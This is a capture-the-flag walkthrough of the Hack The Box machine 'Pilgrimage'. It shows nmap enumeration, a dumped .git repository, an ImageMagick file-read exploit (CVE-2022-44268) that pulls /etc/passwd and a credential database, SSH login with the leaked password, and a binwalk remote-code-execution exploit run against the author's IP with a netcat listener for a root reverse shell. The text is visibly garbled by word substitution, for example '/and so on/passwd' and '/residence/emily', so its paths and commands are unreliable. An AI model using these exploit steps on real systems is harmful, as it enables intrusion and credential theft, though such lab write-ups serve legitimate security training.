with the nmap command nmap -p- -sV -sC 10.10.11.219 we obtained this consequence:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 20be60d295f628c1b7e9e81706f168f3 (RSA)
| 256 0eb6a6a8c99b4173746e70180d5fe0af (ECDSA)
|_ 256 d14e293c708669b4d72cc80b486e9804 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Didn't observe redirect to http://pilgrimage.htb/
|_http-server-header: nginx/1.18.0
Service Data: OS: Linux; CPE: cpe:/o:linux:linux_kernel
So we all know there is a SSH server, and a http server operating nginx 1.18.0.
Going to the web site we come to this web page:
We now have the choice to log in, register or add a picture the place it exhibits the shrunk model of that picture. If we make an account after which log in we get a “Dashboard” tab that permits us to see all the earlier photographs that now we have uploaded to the web site.
Right here I used to be caught for some time attempting a bunch of stuff. Which is once I went again to enumeration. At all times return to enumeration should you get caught, do not tunnel imaginative and prescient as a result of perhaps you are lacking one thing. In my case I used to be lacking an open .git repo on the 80 server. Since we did not have the IP redirect hyperlink in our /and so on/hosts nmap gave us this output http-title: Didn't observe redirect to http://pilgrimage.htb/ Nonetheless if we run nmap -p 80 -sV -sC 10.10.11.219 once more, nevertheless this time solely on port 80 whereas having the redirect in out /and so on/hosts we get this output:
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.18.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: nginx/1.18.0
| http-git:
| 10.10.11.219:80/.git/
| Git repository discovered!
| Repository description: Unnamed repository; edit this file 'description' to call the...
|_ Final commit message: Pilgrimage picture shrinking service preliminary commit. # Please ...
|_http-title: Pilgrimage - Shrink Your Photos
Now we all know for positive there’s a /.git/ folder on the server. Now we will use a software like Git dumperto extract all the data from the git folder on to our personal machine and try the supply code.
At first I believed there was an issue with the code, nevertheless every part appears sanitized. One factor we will hold in notice for later although is that the databased is saved in /var/db/pilgrimage as we see within the code $db = new PDO('sqlite:/var/db/pilgrimate');.
However what is that this /var/ww/pilgimage.htb/magik? Taking a detailed have a look at it by going into the git folder and going ./magik -version we get this output:
Model: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Options: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)
Googling ImageMagick 7.1.0-49 I got here throughout a vulnerability with ImageMagick 7.1.0 This vulnerability was relies upon the -resize command inside Magick, precisely what we’re in search of. If we insert arbitrary code into the picture, give it to Magick after which redownload it, we’ll get the output into the resized picture. Let’s attempt it first by making it print out /and so on/password of the server with this script: CVE-2022-44268.
After we did cargo run "/and so on/passwd" on the file we obtained a picture with code injected into it. After we add it to the server and obtain the “shrunken” model of it we will run determine -verbose {picture} to get the outputting hex values of our enter. Inputting it to one thing like CyberChef and changing it from hex to ascii we get this output:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
video games:x:5:60:video games:/usr/video games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
information:x:9:9:information:/var/spool/information:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
listing:x:38:38:Mailing Checklist Supervisor:/var/listing:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
no person:x:65534:65534:no person:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Community Administration,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
emily:x:1000:1000:emily,,,:/residence/emily:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
Only for the enjoyable of it I attempted to additionally get the worth of /and so on/shadow nevertheless that didn’t get us any consequence as a result of Magick will not be allowed to learn /and so on/shawdow. What we will attempt is to get the content material of the /var/db/pilgrimage database as we noticed from earlier. Doing the identical factor as earlier we get a bunch of hex values. Plugging that into cyberchef permits us to see the contents of it.
In a bunch of null values we get the sql code:
And a lot decrease down we see this:
Our personal account is which is the creatively named asdfasd with the password asdf.
Extra importantly we see the consumer emily from earlier than with the password abigchonkyboi123. Stylish.
With the data that folks use the identical password all over the place, we will attempt to ssh into the machine with the username emily and password abigchonkyboi123.
bingo
Now we cat out the content material of the consumer.txt.
Wanting on the residence listing we discover some fascinating information. Most notably pspy32 and binwalk_exploit.png. Wanting on the pspy32 output we see that root is operating one thing known as /sbin/malwarescan.sh. Wanting nearer at that we see the next code:
#!/bin/bash
blacklist=("Executable script" "Microsoft executable")
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | whereas learn FILE; do
filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
binout="$(/usr/native/bin/binwalk -e "$filename")"
for banned in "${blacklist[@]}"; do
if [[ "$binout" == *"$banned"* ]]; then
/usr/bin/rm "$filename"
break
fi
finished
finished
Right here we see code being run each time one thing is modified within the /var/www/pilgrimage.htb/shrunk/ listing with the assistance of the inotifywait command. We additionally see /usr/native/bin/binwalk -e being run on each file each time a change is finished in that listing. Let’s check out the binwalk model on this machine.
emily@pilgrimage:~$ binwalk -h
Binwalk v2.3.2 Craig Heffner, ReFirmLabs https://github.com/ReFirmLabs/binwalk
If we glance up
binwalk v2.3.2
we discover a distant code execution vulnerbility is in binwalk model 2.3.2. Fortunately the script from exploit database is already downloaded on the machine within the /tmp/ folder.
So all now we have to do is to jot down is python3 /tmp/51249.py catt.png {YOUR_IP} {YOUR_PORT} after which begin a netcat listener on that port. You’ll then get a picture known as binwalk_exploit.png in your folder and all you must do now’s copy it over with cp binwalk_exploit.png /var/www/pilgrimage.htb/shrunk/ and growth.
That is undoubtedly the toughest field straightforward field I’ve finished on hack the field. I used to be caught on step one for an extended whereas, once I randomly determined to run the nmap scan once more and noticed the /.git/ listing. Every thing was fairly good from there although. That is most likely the most effective field I’ve finished on HTB so far. I liked getting the consumer flag immensely. The basis flag was a bit difficult, however studying to learn the pspy32 output helped a ton.
